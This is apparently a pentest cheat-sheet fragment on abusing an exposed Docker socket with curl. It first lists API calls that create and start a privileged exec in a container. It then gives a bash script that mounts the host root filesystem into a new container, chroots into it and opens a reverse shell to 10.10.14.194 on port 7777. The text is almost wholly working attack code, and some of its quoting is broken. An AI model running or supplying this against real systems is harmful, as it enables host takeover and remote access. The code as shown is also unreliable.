#Get all containers or images: curl -i -s --unix-socket /var/run/docker.sock -X GET http://localhost/containers/json #Create a new container curl -i -s --unix-socket /var/run/docker.sock -X POST \ -H "Content-Type: application/json" \ --data-binary '{"AttachStdin": true,"AttachStdout": true,"AttachStderr": true,"Cmd": ["bash", "/etc/passwd"],"DetachKeys": "ctrl-p,ctrl-q","Privileged": true,"Tty": true}' \ http://localhost/containers/container_id/exec #Start the newer container with the command curl -i -s --unix-socket /var/run/docker.sock -X POST \ -H 'Content-Type: application/json' \ --data-binary '{"Detach": false,"Tty": false}' \ http://localhost/exec/exec_id/start
#!/bin/bash pay="bash -c 'bash -i >& /dev/tcp/10.10.14.194/7777 0>&1'" payload="["/bin/sh","-c","chroot /mnt sh -c \"$pay\""]" response=$(curl -s -XPOST --unix-socket /var/run/docker.sock -d "{"Image":"sandbox","cmd":$payload, "Binds": ["/:/mnt:rw"]}" -H 'Content-Type: application/json' http://localhost/containers/create) revShellContainerID=$(echo "$response" | cut -d'"' -f4) curl -s -XPOST --unix-socket /var/run/docker.sock http://localhost/containers/$revShellContainerID/start sleep 1 curl --output - -s --unix-socket /var/run/docker.sock "http://localhost/containers/$revShellContainerID/logs?stderr=1&stdout=1"